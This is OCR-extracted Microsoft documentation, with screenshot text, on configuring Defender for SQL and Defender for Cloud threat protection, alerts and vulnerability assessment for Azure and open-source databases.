show the Microsoft Defender for Cloud alerts page, which provides an overview of 


Defect in application code constructing SQL statements; 
application code doesn't sanitize user input and was 
exploited to inject malicious SQL statements. 


View the vulnerable SQL statement 


Read more about SQL Injection threat and how to fix the 
vulnerable application code. 


. Click the View recent SQL alerts link in the email to launch the Azure portal and 


active threats detected on the database. 


2. Click a specific alert to get additional details and actions for investigating this 
threat and remediating future threats. 


For example, SQL injection is one of the most common Web application security 
issues on the Internet that is used to attack data-driven applications. Attackers take 
advantage of application vulnerabilities to inject malicious SQL statements into 
application entry fields, breaching or modifying data in the database. For SQL 
Injection alerts, the alert's details include the vulnerable SQL statement that was 
exploited. 


Z Learn more 


/ General information 


DESCRIPTIO 
DETECTION TIME Sunday, 13 May 2018, 3:09:12 pm 
SEVERIT @ High 

STATE Active 

ATTACKED RESOURCE amplecrmwedemo 

SUBSCRIPTIO 

ERO am a a 

DETECTED BY ge Microsoft 

ACTION TAKEN Detected 


View the vulnerable SQL statement 


Read more about SQL Injection threat and how to fix the vulnerable 
application code. 


Explore alerts in the Azure portal 


Advanced Threat Protection integrates its alerts with Microsoft Defender for Cloud”. 
Live SQL Advanced Threat Protection tiles within the database and SQL Microsoft 
Defender for Cloud blades in the Azure portal track the status of active threats. 


Click Advanced Threat Protection alert to launch the Microsoft Defender for Cloud 
alerts page and get an overview of active SQL threats detected on the database. 


| P Search (Ctrl+/) 


D Copy EO Restore T Export @ Set server firewall OI Delete ZO Connect with.. v © Feedback 


E Overview 

E Activity log 

o Tags 

ZG Diagnose and solve problems 
&> Quick start 


Æ Query editor (preview) 


Power Platform 
d Power BI (preview) 
@ Power Apps (preview) 


E, Power Automate (preview) 


Settings 

© configure 
Geo-Replication 
Connection strings 
Sync to other databases 
Add Azure Search 
Properties 


Locks 


Integrations 


“2 Stream analytics (preview) 


P Search (Ctri+/) 


Integrations 

“2 Stream analytics (preview) 
Security 

Ea Auditing 

Data Discovery & Classification 


E Dynamic Data Masking 


DO Security Center 


@ Transparent data encryption 


Intelligent Performance 


GO Performance overview 


Performance recommendations 
E Query Performance insight 


Automatic tuning 


Monitoring 
E Alerts 
ti Metrics 
E Diagnostic settings 


:® Logs 


Tags (change) : Click here to add tags 


Show data for last: K 1hour } 24hours 7 days 


Compute utilization 


DTU percentage (Max) 
mstwitterbotdbserver/mstwitterbot_db2355 


0s 


Database data storage © Notifications (1) Database features (6) 


Alerts (1) 


A Advanced Threat Protection alerts 


There is 1 alert for this database. Click here to 
review. 


| « #3 settings Q Feedback 


A Complete Azure Defender for SQL setup by selecting a storage account for Vulnerability Assessment > 


E Vulnerability Assessment DO Advanced Threat Protection 


| High risk failures | HIGH SEVERITY ALERTS 
I Medium risk failures | MEDIUM SEVERITY ALER... 


I Low risk failures 


Security Alerts 
Click to configure a storage account for storing scan 


results. Description Date 


There are no failing security checks. 4 Logon from an unusual l... 9/5/2020 


© Tum on auditing for full investigation experience 


Next steps 


e Learn more about Advanced Threat Protection in Azure SQL Database & Azure 


Synapse. 


e Learn more about Advanced Threat Protection in Azure SQL Managed Instance. 
e Learn more about Microsoft Defender for SQL. 


e Learn more about Azure SQL Database auditing 


e Learn more about Microsoft Defender for Cloud For more information on pricing, 
see the Azure SQL Database pricing page” 


Configure Advanced Threat Protection 
for Azure SQL Database 


Article e 03/03/2023 
Applies to: D Azure SQL Database 


Advanced Threat Protection for Azure SQL Database detects anomalous activities 
indicating unusual and potentially harmful attempts to access or exploit databases. 
Advanced Threat Protection can identify Potential SQL injection, Access from unusual 
location or data center, Access from unfamiliar principal or potentially harmful 
application, and Brute force SQL credentials - see more details in Advanced Threat 
Protection alerts. 


You can receive notifications about the detected threats via email notifications or Azure 
portal 


Advanced Threat Protection is part of the Microsoft Defender for SQL offering, which is 
a unified package for advanced SQL security capabilities. Advanced Threat Protection 
can be accessed and managed via the central Microsoft Defender for SQL portal. 


Set up Advanced Threat Protection in the Azure 
portal 


1. Sign into the Azure portal”. 


2. Navigate to the configuration page of the server you want to protect. In the 
security settings, select Microsoft Defender for Cloud. 


3. On the Microsoft Defender for Cloud configuration page: 


a. If Microsoft Defender for SQL hasn't yet been enabled, select Enable Microsoft 
Defender for SQL. 


b. Select Configure. 


= i 5 d A EO chrisqpublic@contoso.c... 
cree vim © Search resources, services, and docs (G+/) EI EK E Hi E Conroso, LTD. (CONTOSO, LTO. 


Home > chrisqpublictest 


O chrisqpublictest | Microsoft Defender for Cloud = x 
SQL server 
[ E Search (Ctrl+/) } « D Visit Microsoft Defender for Cloud to manage security across your virtual networks, data, apps, and more e 
@ Backups 
W Deleted databases Recommendations Security alerts Findings Microsoft Defender for SQL: Disabled (Confi Learn more 
gure) About Microsoft Defender for Clou 

® Failover groups 

5 (1) 0 0 5 E About Microsoft Defender for SQL 
3 Import/Export history 
Security A > 
By Auditing 


Microsoft Defender for SQL 


D Firewalls and virtual networks 


<b Private endpoint connections Azure Defender for SQL helps you strengthen your security posture, identify and manage security vulnerabilities and 


© Microsoft Defender for Cloud protect against threats on your SQL servers. 


@ Transparent data encryption You are invited to a 30-day trial, free of charge. After the trial ends, you will be charged $15/Server/Month 


® Identity Enable Microsoft Defender for SQL 


Intelligent Performance 


c. Under ADVANCED THREAT PROTECTION SETTINGS, select Add your contact 
details to the subscription's email settings in Defender for Cloud. 


— Microsoft Azure Ø Search resources, services, and docs (G+/) 


Home > chrisqpublictest > 


Server settings 


chrisqpublictest 


Save X Discard p Feedback 


VULNERABILITY ASSESSMENT SETTINGS 


Subscription 
Contoso Team 
Select Subscription 


Storage account 
Select Storage account 


Periodic recurring scans 


ON OFF 


Send scan reports to © 


Also send email notification to admins and subscription owners © 


ADVANCED THREAT PROTECTION SETTINGS 


Advanced Threat Protection for SQL alerts emails are sent by Defender for Cloud. 


Add your contact details to the subscriptions email settings in Defender for Cloud. © 


GO Enable Auditing for better threats investigation experience 


d. Provide the list of emails to receive notifications upon detection of anomalous 


database activities in the Additional email addresses (separated by commas) 
text box. 


e. Optionally customize the severity of alerts that will trigger notifications to be 
sent under Notification types. 


f. Select Save. 


Microsoft Azure Ø Search resources, services, and docs (G+/) Ga chrisqpublic@contoso.c... 


CONTOSO, LTD. (CONTOSO, LTD. 
Home > chrisqpublictest > Server settings 


Email notifications 
E Save 


Email recipients 


Select who'll get the email notifications from Defender for Cloud for the Contoso Team subscription. 


All users with the following roles Owner 


Additional email addresses (separated by commas) 


Notification types 


Use the settings below to select the type of email notifications to be sent by Defender for Cloud 


E Notify about alerts with the following severity (or higher) High EO Q 


@ You'll receive a maximum of one email per 6 hours for high-severity alerts, one email per 12 hours for medium-severity alerts, and one email per 24 hours for low-severity alerts. Learn more 


Set up Advanced Threat Protection using 
PowerShell 


For a script example, see Configure auditing and Advanced Threat Protection using 
PowerShell. 


Next steps 


Learn more about Advanced Threat Protection and Microsoft Defender for SQL in the 
following articles: 


e Advanced Threat Protection 

e Advanced Threat Protection in SQL Managed Instance 

e Microsoft Defender for SQL 

e Auditing for Azure SQL Database and Azure Synapse Analytics 
e Microsoft Defender for Cloud 


e For more information on pricing, see the SQL Database pricing page Z 


Enable Microsoft Defender for SQL 
servers on machines 
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Defender for SQL protects your laaS SQL Servers by identifying and mitigating potential 
database vulnerabilities and detecting anomalous activities that could indicate threats to 
your databases. 


Defender for Cloud populates with alerts when it detects suspicious database activities, 
potentially harmful attempts to access or exploit SQL machines, SQL injection attacks, 
anomalous database access and query patterns. The alerts created by these types of 
events appear on the alerts reference page. 


Defender for Cloud uses vulnerability assessment to discover, track, and assist you in the 
remediation of potential database vulnerabilities. Assessment scans provide an overview 
of your SQL machines’ security state and provide details of any security findings. 


Learn more about vulnerability assessment for Azure SQL servers on machines. 


Defender for SQL servers on machines protects your SQL servers hosted in Azure, 


multicloud, and even on-premises machines. 
e Learn more about SQL Server on Virtual Machines Z. 


e For on-premises SQL servers, you can learn more about Azure Arc-enabled SQL 
Server and how to install Log Analytics agent on Windows computers without 
Azure Arc. 


e For multicloud SQL servers: 
o Connect your AWS accounts to Microsoft Defender for Cloud 


o Connect your GCP project to Microsoft Defender for Cloud 


O Note 


You must enable database protection for your multicloud SQL servers 
through the AWS connector or the GCP connector. 


Availability 


Aspect Details 
Release state: General availability (GA) 


Pricing: Microsoft Defender for SQL servers on machines is billed as shown on 
the pricing page’ 


Protected SQL SQL Server version: 2012, 2014, 2016, 2017, 2019, 2022 
versions: - SQL on Azure virtual machines 
- SQL Server on Azure Arc-enabled servers 
- On-premises SQL servers on Windows machines without Azure Arc 


Clouds: © Commercial clouds 
© Azure Government 
© Microsoft Azure operated by 21Vianet (Advanced Threat Protection 
Only) 


Set up Microsoft Defender for SQL servers on 
machines 


The Defender for SQL server on machines plan requires either the Microsoft Monitoring 
Agent (MMA) or Azure Monitoring Agent (AMA) to prevent attacks and detect 
misconfigurations. The plan's autoprovisioning process is automatically enabled with the 
plan and is responsible for the configuration of all of the agent components required for 
the plan to function. This includes, installation and configuration of MMA/AMA, 
workspace configuration and the installation of the plan's VM extension/solution. 


Microsoft Monitoring Agent (MMA) is set to be retired in August 2024. Defender for 
Cloud updated its strategy accordingly by releasing a SQL Server-targeted Azure 
Monitoring Agent (AMA) autoprovisioning process to replace the Microsoft Monitoring 
Agent (MMA) process which is set to be deprecated. Learn more about the AMA for SQL 


server on machines (Preview) autoprovisioning process and how to migrate to it. 


O Note 


During the Azure Monitoring Agent for SQL Server on machines (Preview), 
customers who are currently using the Log Analytics agent/Azure Monitor agent 
processes will be asked to migrate to the AMA for SQL server on machines 
(Preview) autoprovisioning process. 


To enable the plan: 


1. Sign in to the Azure portal £. 


2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant subscription. 


5. On the Defender plans page, locate the Databases plan and select Select types. 


beree ota rg ee 

E e ee, 
ZA intone e ea 
B rr Ora Co Zi 
EZ ee ~ ED 
Zurro ze. EE 
Gere Tz SE 
(@) erte e D 
© om: TZ Sa 
EE rren E 


EE 


6. In the Resource types selection window, toggle the SQL servers on machines plan 
to On. 


7. Select Continue. 

8. Select Save. 

9. (Optional) Configure advanced autoprovisioning settings: 
a. Navigate to the Environment settings page. 
b. Select Settings & monitoring. 


e For customer using the current generally available autoprovisioning 
process, select Edit configuration for the Log Analytics agent/Azure 
Monitor agent component. 


e For customer using the preview of the autoprovisioning process, select 
Edit configuration for the Azure Monitoring Agent for SQL server on 
machines (Preview) component. 


Explore and investigate security alerts 


There are several ways to view Microsoft Defender for SQL alerts in Microsoft Defender 
for Cloud: 


e The Alerts page. 

e The machine's security page. 

e The workload protections dashboard. 

e Through the direct link provided in the alert's email. 
To view alerts: 

1. Sign in to the Azure portal £. 

2. Search for and select Microsoft Defender for Cloud. 

3. Select Security alerts. 

4. Select an alert. 


Alerts are designed to be self-contained, with detailed remediation steps and 
investigation information in each one. You can investigate further by using other 
Microsoft Defender for Cloud and Microsoft Sentinel capabilities for a broader view: 


e Enable SQL Server's auditing feature for further investigations. If you're a Microsoft 
Sentinel user, you can upload the SQL auditing logs from the Windows Security 
Log events to Sentinel and enjoy a rich investigation experience. Learn more about 
SQL Server Auditing. 


e To improve your security posture, use Defender for Cloud's recommendations for 
the host machine indicated in each alert to reduce the risks of future attacks. 


Learn more about managing and responding to alerts. 


Next steps 
For related information, see these resources: 


e How Microsoft Defender for Azure SQL can protect SQL servers anywhere“. 
e Security alerts for SQL Database and Azure Synapse Analytics 

e Set up email notifications for security alerts 

e Learn more about Microsoft Sentinel 

e Check out common questions about Defender for Databases. 


Migrate to SQL server-targeted Azure 
Monitoring Agent's (AMA) 
autoprovisioning process (Preview) 
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Microsoft Monitoring Agent (MMA) is being deprecated in August 2024. As a result, a 
new SQL server-targeted Azure Monitoring Agent (AMA) autoprovisioning process is 

being released in preview. You can learn more about the Defender for SQL Server on 

machines Log Analytics Agent's deprecation plan. 


During the preview, customers who are using the current autoprovisioning process with 
Azure Monitor Agent (Preview) option, should migrate to the new Azure Monitoring 
Agent for SQL server on machines (Preview) autoprovisioning process. The migration 
process is seamless and provides continuous protection for all machines. 


Migrate to the SQL server-targeted AMA 
autoprovisioning process 


1. Sign in to the Azure portal Z. 


N 


. Search for and select Microsoft Defender for Cloud. 


LA) 


. In the Defender for Cloud menu, select Environment settings. 


4. Select the relevant subscription. 


LI 


. Under the Databases plan, select Action required. 


Home > Microsoft Defender for Cloud | Environment settings 


gı Settings | Defender plans 


> 
g 


` Cloud Workload Protection (CWP) 


Resource quantity Monitoring coverage 


a 
A 
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O Note 


If you do not see the action required button, under the Databases plan select 
Settings and then toggle the Azure Monitoring Agent for SQL server on 
machines (Preview) option to On. Then select Continue > Save. 


6. In the pop-up window, select Enable. 


Update the SQL servers on machines plan agent autoprovisioning settings 


Defender for SQL server on machines plan is migrating to a SQL-targeted Azure Monitoring Agent autoprovisioning 
process. Enable the new process to continue protecting your SQL VMs and Arc-enable SQL Servers. Q 


7. Select Save. 
Once the SQL server-targeted AMA autoprovisioning process has been enabled, you 
should disable the Log Analytics agent/Azure Monitor agent autoprovisioning process. 
© Note 


If you have the Defender for Server plan enabled, you will need to review the 
Defender for Servers Log Analytics deprecation plan for Log Analytics 
agent/Azure Monitor agent dependency before disabling the process. 


Disable the Log Analytics agent/Azure Monitor 
agent 

1. Sign in to the Azure portal Z. 

2. Search for and select Microsoft Defender for Cloud. 

3. In the Defender for Cloud menu, select Environment settings. 

4. Select the relevant subscription. 

5. Under the Database plan, select Settings. 


6. Toggle the Log Analytics agent/Azure Monitor agent to Off. 


Settings & monitoring 


7. Select Continue. 


8. Select Save. 


Next steps 


For related information, see these resources: 


e How Microsoft Defender for Azure SQL can protect SQL servers anywhere Z. 
e Security alerts for SQL Database and Azure Synapse Analytics 

e Set up email notifications for security alerts 

e Learn more about Microsoft Sentinel 

e Check out common questions about Defender for Databases. 


Scan your SQL servers for vulnerabilities 


Article e 05/10/2023 


Microsoft Defender for SQL servers on machines extends the protections for your 
Azure-native SQL Servers to fully support hybrid environments and protect SQL servers 
(all supported version) hosted in Azure, other cloud environments, and even on- 


premises machines: 


e SQL Server on Virtual Machines E 
e On-premises SQL servers: 
o SQL Server on Azure Arc-enabled servers 
o SQL Server running on Windows machines without Azure Arc 


The integrated vulnerability assessment scanner discovers, tracks, and helps you 
remediate potential database vulnerabilities. Assessment scans findings provide an 
overview of your SQL machines’ security state, and details of any security findings. 


O Note 


The scan is lightweight, safe, only takes a few seconds per database to run and is 
entirely read-only. It does not make any changes to your database. 


Explore vulnerability assessment reports 


The vulnerability assessment service scans your databases every 12 hours. 


The vulnerability assessment dashboard provides an overview of your assessment results 
across all your databases, along with a summary of healthy and unhealthy databases, 
and an overall summary of failing checks according to risk distribution. 


You can view the vulnerability assessment results directly from Defender for Cloud. 
1. From Defender for Cloud's sidebar, open the Recommendations page. 


2. Select the recommendation SQL servers on machines should have vulnerability 
findings resolved £ . For more information, see the Defender for Cloud 


recommendations reference page. 


v= Microsoft Defender for Cloud | Recommendations & 


Showing 41 subscriptions 
4 Download CSV report 


Secure Score 


DO 60% (~36 of 60 points) 


Recommendations status 


5 1 completed control 16 Total 
| PS 

49 completed 255 Total 
Y= recommendations 
— Ka 


Each security control below represents a security risk you should mitigate. 
Address the recommendations in each control, focusing on the controls worth the most points. 


To get the max score, fix all recommendations for all resources in a control. 


Learn more > 


Resource health 


Unhealthy 
1.4K 
Healthy 


1.2K 


2,860 


TOTAL 


Not applicable 


288 


x 


[e sql Group by controls: €D On 
Controls Unhealthy resources Resource Health 
wv Remediate vulnerabilities 179 of 239 resources N 
Advanced data security should be enabled on your SQL servers E. 6 of 48 SQL servers — 
Vulnerability assessment should be enabled on your SQL servers E, 41 of 48 SQL servers = 
Vulnerability assessment should be enabled on your SQL managed instances B 2 of 2 managed instances Larak 
Vulnerability Assessment findings on your SQL databases should be remediated ZO 29 of 30 azure resources Ex 
ZO 4 of 4 azure resources kareak 
> Enable encryption at rest 155 of 233 resources = 
> Restrict unauthorized network access 47 of 244 resources KS 
> Enable auditing and logging 135 of 181 resources lara 
The detailed view for this recommendation appears. 
Vulnerability assessment findings on your SQL servers on machines should be remediated = x 
© Exempt O Disable rule (C4 View policy definition 
v Description 
v Affected resources 
A^ Security Checks 
Findings Passed Disabled findings 
| Benchmarks: All E | 
| Ø Search to filter items... | 
ID Security Check Category Applies To Benchmark Severity 
VA2108 Minimal set of principals should be members of fixed high impac... Authentication And Authorization 10 of 15 databases FedRAMP @ High 
VA2129 Changes to signed modules should be authorized Authentication And Authorization 8 of 13 databases cls @ High 
VA1258 Database owners are as expected Auditing And Logging 5 of 5 databases FedRAMP @ High 
VA2114 Minimal set of principals should be members of fixed server roles Authentication And Authorization 4 of 4 databases FedRAMP @ High 
VA2120 Features that may affect security should be disabled Surface Area Reduction 4 of 4 databases CIS, FedRAMP @ High 
VA2110 Execute permissions to access the registry should be restricted Authentication And Authorization 4 of 4 databases FedRAMP @ High 
VA1220 Database communication using TDS should be protected throug... Data Protection 3 of 5 databases FedRAMP @ High 
VA1279 Force encryption should be enabled for TDS Data Protection 2 of 5 databases FedRAMP @ High 
VA1018 Latest updates should be installed Installation Updates And Patches 2 of 3 databases CIS, FedRAMP @ High 
VA1059 xp_cmdshell should be disabled Surface Area Reduction 1 of 5 databases CIS, FedRAMP @ High 
1 2 3 > 


3. For more details, drill down: 


e For an overview of scanned resources (databases) and the list of security 


checks that were tested, open the Affected resources and select the server of 


interest. 


e For an overview of the vulnerabilities grouped by a specific SQL database, 
select the database of interest. 


In each view, the security checks are sorted by Severity. Select a specific security 
check to see a details pane with a Description, how to Remediate it, and other 
related information such as Impact or Benchmark. 


Set a baseline 


As you review your assessment results, you can mark results as being an acceptable 
baseline in your environment. The baseline is essentially a customization of how the 
results are reported. Results that match the baseline are considered as passing in 
subsequent scans. After you've established your baseline security state, the vulnerability 
assessment scanner only reports on deviations from the baseline. In this way, you can 
focus your attention on the relevant issues. 


Vulnerability assessment findings on your SQL servers on machines should be remediated > Vulnerability assessment findings on ‘AMTA-DEV' should be remediated > master (AMTA-DEV/SQ| 


VA2110 - Execute permissions to access the registry should be restricted & 


Severity Status Scan time Remediation 
@ High © Unhealthy 12/2/2020 
Review the list of principals that have permission to execute registry extended stored procedures. Revoke execute permissions for pring 
the remaining principals as a baseline and track that changes made to this list are desirable. Note that revoking execute permissions to} 
applications that use SMO library such as SSMS. 


Description 
Registry extended stored procedures allow Microsoft SQL Server to read, REVOKE EXECUTE ON [xp_instance_regread] TO [NT Service\HealthService] 
write, and enumerate values and keys in the registry. This rule REVOKE EXECUTE ON [xp_regread] TO [public] 


enumerates principals with permission to execute registry extended 


stored procedures. © Exercise standard precautions when using the suggested remediation script on production environments 


Impact 
Query and results © 

The registry contains sensitive information, including password hashes as 
well as clear text passwords. Registry extended stored procedures allow 
Microsoft SQL Server to access the machine's registry. The sensitivity of SELECT OBJECT_NAME(major_id) AS [Stored Procedure] e 
these procedures are exacerbated if Microsoft SQL Server is run under 
the Windows account LocalSystem. LocalSystem can read and write 
nearly all values in the registry, even those not accessible by the 
Administrator. Unlike the xp_cmdshell extended stored procedure, which 
runs under a separate context if executed by a login not in the sysadmin 
role, the registry extended stored procedures always execute under the 
security context of the MSSQLServer service. Because the sensitive d ; 
information is stored in the registry, it is essential that access to that OBJECT JD(xp_regenumvalues ) 

,OBJECT_ID(‘xp_regenumkeys') 


information be properly guarded. TE ETZE = 


Benchmark Add all results as baseline Remove all from baseline 


e FedRAMP 


,dpr.NAME AS [Principal] 
FROM sys.database_permissions AS dp 
INNER JOIN sys.database_principals AS dpr ON dp.grantee_principal_id = dpr.principal_id 
WHERE major_id IN ( 
OBJECT_ID(‘xp_regaddmultistring’) 
,OBJECT_ID(‘xp_regdeletekey’) 
,OBJECT_ID(‘xp_regdeletevalue’) 


Export results 


Use the Continuous export feature of Microsoft Defender for Cloud to export 
vulnerability assessment findings to Azure Event Hubs or to Log Analytics workspace. 


View vulnerabilities in graphical, interactive 
reports 


Defender for Cloud's integrated Azure Monitor Workbooks gallery includes an 


interactive report of all findings from the vulnerability scanners for machines, containers 


in container registries, and SQL servers. 


Findings for each of these scanners are reported in separate recommendations: 


e Machines should have vulnerability findings resolved Z 

e Container registry images should have vulnerability findings resolved (powered by 
Qualys) € 

e SQL databases should have vulnerability findings resolved £ 

e 


SQL servers on machines should have vulnerability findings resolved Z 


The ‘Vulnerability Assessment Findings’ report gathers all of these findings and 


organizes them by severity, resource type, and category. You can find the report in the 


workbooks gallery available from Defender for Cloud's sidebar. 


Microsoft Defender for Cloud | Workbooks | Vulnerability Assessment Findings 2# ~ 


Showing 64 subscriptions 
a Workbooks GA Edit O QO x @ ? Help 


Vulnerability Assessment Findings (Preview) 


Subscription Show Help < 


l All v] (Yes [ No J 


Overview Machines edi) 


Vulnerable SQL resources | Select a resource to view the list of vulnerabilities D 
l P Search 
Resource group N Total® High TA Medium Ty Low TA 


v [5] ADS_SQLServer Demo 
a mat-dev 24 14 3 7 


Vv @ SOC-Purview 


E onpremsql 27 12 4 11 
RE OLE! 
aii Ignitez020 
EA vm2017 19 9 2 8 
pa = pa 
beiz DEFENDFLAG 
E sdminpc2 20 9 1 10 
pe = pra 
wv [5] AZURE-SQL 
E 5912014-vm 15 7 3 5 
= EO pa 


Group by 


Resource v | 


Vulnerable databases per server 


Resource Ty Totaly High T, Medium Ty Low 
if a T pe pr — . 
E RO-DEV/SQLEXPRESS/msi 3 2 0 1 
= D 
re RO-DEV/SQLEXPRESS/mo 1 H 0 A 
ra RO-DEV/SQLEXPRESS/De: 21 1 0 
A = 
va onpremsal (4) 
E OnPremSQUMSSQLS/ma 19 7 2 10 
e o B Sr 
© OnPremSQUMSSQLS/Wik 42 2 0 
= E 
$ OnPremSQU/MSSQLS/ms: 3 2 0 1 
= D 
$ OnPremSQUMSSQLS/mo ta o 0 
va ronsqlvm2017 (3) 
© RVM2017/MSSQLSERVER 16 7 2 7 
—— a a 


Vulnerabilities 
Grouped by resource | Use the search box to filter vulnerabilities by resource, resource group, severity, etc. d 
l P Search 
Group TA, Severity Ty Vulnid Ty Description TA, Category M Resource 


> @ ads-server (9) 
NE, sqlserver (4) 


> @ sqlserver2 (5) 


Disable specific findings 


If you have an organizational need to ignore a finding, rather than remediate it, you can 


optionally disable it. Disabled findings don't impact your secure score or generate 


unwanted noise. 


When a finding matches the criteria you've defined in your disable rules, it won't appear 
in the list of findings. Typical scenarios include: 


e Disable findings with severity below medium 
e Disable findings that are non-patchable 
e Disable findings from benchmarks that aren't of interest for a defined scope 


@ Important 


To disable specific findings, you need permissions to edit a policy in Azure Policy. 
Learn more in Azure RBAC permissions in Azure Policy. 


To create a rule: 


1. From the recommendations detail page for SQL servers on machines should have 
vulnerability findings resolved z, select Disable rule. 


2. Select the relevant scope. 
3. Define your criteria. You can use any of the following criteria: 


e Finding ID 
e Severity 
e Benchmarks 


Dashboard > Microsoft Defender for Cloud Disable rule (Preview) x 


Vulnerability assessment findings on your SQL ser "STEE 
Disable Action 


© Exempt S Disable rule ics View policy definition Disable findings that match any of the following criteria: 


v Description Parameters 
IDs © 
wv Affected resources 
VA1258 HA 
^ Security Checks Minimum severity © 
a : . None v 
Findings Passed Disabled findings Benchmarks © 
| Benchmarks: All 
| O Search to filter items... 
ID Security Check Justification (optional) 
VA2108 Minimal set of principals should be members of fixed high impact dat 
VA2129 Changes to signed modules should be authorized 
VA1258 Database owners are as expected 
VA2114 Minimal set of principals should be members of fixed server roles 
VA2120 Features that may affect security should be disabled 
EE h bed O New disable rules applied to a subscription might take up to 
VA2110 Execute permissions to access the registry should be restricted 30 minutes to take effect. New rules on a management group 
2. 
VA1220 Database communication using TDS should be protected through TLS Tg E E LELE 


Disabling rule on the MG will apply/override any rules that 
VA1279 Force encryption should be enabled for TDS may exist on underlying subscriptions 


VA1018 Latest updates should be installed Apply rule | Cancel 


VA1059 xp_cmdshell should be disabled 


Trigger logic apy Exempt 


4. Select Apply rule. Changes might take up to 24 hrs to take effect. 
5. To view, override, or delete a rule: 
a. Select Disable rule. 


b. From the scope list, subscriptions with active rules show as Rule applied. 


Disable rule 


41 subscriptions 


You can define a rule to disable one or more findings for this recommendation. Disabled findings won't be counted towards your 
secure score 


Item Current status More 
ATA 
Vv A 
? Rule applied E Jy 
ba A, View rule 
v HO Delete rule 
? 


c. To view or delete the rule, select the ellipsis menu ("..."). 


Manage vulnerability assessments 
programmatically 


Using Azure PowerShell 


You can use Azure PowerShell cmdlets to programmatically manage your vulnerability 
assessments. The supported cmdlets are: 
Cmdlet name as a link Description 


Add- Add SQL Vulnerability Assessment baseline. 
AzSecuritySqlVulnerabilityAssessmentBaseline 


Get- Get SQL Vulnerability Assessment baseline. 
AzSecuritySqlVulnerabilityAssessmentBaseline 


Get- Gets SQL Vulnerability Assessment scan 
AzSecuritySqlVulnerabilityAssessmentScanResult results. 


Get- Gets SQL Vulnerability Assessment scan 
AzSecuritySqlVulnerabilityAssessmentScanRecord records. 


Cmdlet name as a link 


Remove- 
AzSecuritySqlVulnerabilityAssessmentBaseline 


Set- 
AzSecuritySqlVulnerabilityAssessmentBaseline 


Data residency 


Description 


Removes SQL Vulnerability Assessment 
baseline. 


Sets new SQL Vulnerability Assessment 
baseline on a specific database discards old 
baseline if any exists. 


SQL Vulnerability Assessment queries the SQL server using publicly available queries 


under Defender for Cloud recommendations for SQL Vulnerability Assessment, and 


stores the query results. SQL Vulnerability Assessment data is stored in the location of 


the Log Analytics workspace that the machine is connected to. For example, if the user 


connects a SQL Virtual Machine to a Log Analytics workspace in West Europe, the results 
will be stored in West Europe. This data will be collected only if the SQL Vulnerability 


Assessment solution is enabled on the Log Analytics workspace. 


Metadata information about the connected machine is also collected. Specifically: 


e Operating system name, type, and version 


e Computer fully qualified domain name (FQDN) 


e Connected Machine agent version 
e UUID (BIOS ID) 


e SQL server name and underlying database names 


You can specify the region where your SQL Vulnerability Assessment data will be stored 


by choosing the Log Analytics workspace location. Microsoft may replicate to other 
regions for data resiliency, but Microsoft does not replicate data outside the geography. 


Next steps 


Learn more about Defender for Cloud's protections for SQL resources in Overview of 


Microsoft Defender for SQL. 


Overview of Microsoft Defender for 
open-source relational databases 
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This plan brings threat protections for the following open-source relational databases: 


e Azure Database for PostgreSQL 
e Azure Database for MySQL 
e Azure Database for MariaDB 


Defender for Cloud detects anomalous activities indicating unusual and potentially 
harmful attempts to access or exploit databases. The plan makes it simple to address 
potential threats to databases without the need to be a security expert or manage 
advanced security monitoring systems. 


Availability 


Aspect Details 


Release state: 


Pricing: 


Supported environments: 


Protected versions of 
PostgreSQL: 


Protected versions of 
MySQL: 


Protected versions of 
MariaDB: 


Clouds: 


General availability (GA) 


Microsoft Defender for open-source relational databases is billed 
as shown on the pricing page’ 


© PaaS 


* Azure Arc-enabled machines 


Single Server - General Purpose and Memory Optimized. Learn more 
in PostgreSQL pricing tiers. 


Single Server - General Purpose and Memory Optimized. Learn more 
in MySQL pricing tiers. 


General Purpose and Memory Optimized. Learn more in MariaDB 
pricing tiers. 


OO Commercial clouds 
OO Azure Government 
* Microsoft Azure operated by 21Vianet 


What are the benefits of Microsoft Defender 
for open-source relational databases? 


Defender for Cloud provides security alerts on anomalous activities so that you can 
detect potential threats and respond to them as they occur. 


When you enable this plan, Defender for Cloud will provide alerts when it detects 
anomalous database access and query patterns as well as suspicious database activities. 


These alerts appear in Defender for Cloud's security alerts page and include: 


e details of the suspicious activity that triggered them 

e the associated MITRE ATT&CK tactic 

e recommended actions for how to investigate and mitigate the threat 
e options for continuing your investigations with Microsoft Sentinel 


O Microsoft Defender for Cloud | Security alerts 


x 
tri+/) « © Refresh S eri Open query @ Suppression rules & Security alerts map D Sample alerts d Download CSV report Q Guides & Feedbact 
General Active alerts by severity 
Ọ overview Active alerts Affected resources Iek (14) I Medium (85) 


@ Getting started 
Ọ Suspected brute force attack P 


ZZ Recommendations | © Search by ID, title, or affected resource | Subscription == All Status == Active < 
== i i x + i z EO e 
© security alerts Severity == Low, Medium, High E: Add filter High $ Active | © 05/06/21, ... 
@ inventory —_ 7 Severity Status Activity time 
sf No grouping Vv 
a4 Workbooks BEE 
Alert description 
& Community Severity A Alert title Ty Affected resource Ty Activity start tim... A potential brute force attack has been 
ei detected on your resource. 
Cloud Security High @ Attempted logon by a potentially harmful application © postgresql 05/03/21, 03:30 PN 
© Secure Score | High OO Attempted logon by a potentially harmful application ro postgresql 05/03/21, 03:30 EN Affected resource 
E Regulatory compliance | High Ọ suspected brute force attack +a mysql2 N 05/06/21, 04:45 PN 
b mysql2 
Ọ Workload protections =, M ms 
High @ Suspected brute force attack using a valid user E3 postgresql 05/04/21, 05:36 PN 
E, Firewall Manager ? Ds-43 
| Medium D Login from a principal user not seen in 60 days S postgresql 05/03/21, 03:30 PN Subscription 
Management 
ili Environment settings 
MITRE ATT&CK® tactics ( 
E security solutions 0 
GA Workflow automation e Pre-attack 


View full details | Take action. 


What kind of alerts does Microsoft Defender 
for open-source relational databases provide? 


Threat intelligence enriched security alerts are triggered when there are: 


e Anomalous database access and query patterns - For example, an abnormally 
high number of failed sign-in attempts with different credentials (a brute force 
attempt) 

e Suspicious database activities - For example, a legitimate user accessing an SQL 
Server from a breached computer which communicated with a crypto-mining C&C 
server 


e Brute-force attacks — With the ability to separate simple brute force from brute 


force on a valid user or a successful brute force 


Q Tip 


View the full list of security alerts for database servers in the alerts reference page. 


Next steps 


In this article, you learned about Microsoft Defender for open-source relational 
databases. 


Enable enhanced protections 


Enable Microsoft Defender for open- 
source relational databases and respond 
to alerts 
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Microsoft Defender for Cloud detects anomalous activities indicating unusual and 
potentially harmful attempts to access or exploit databases for the following services: 


e Azure Database for PostgreSQL 
e Azure Database for MySQL 
e Azure Database for MariaDB 


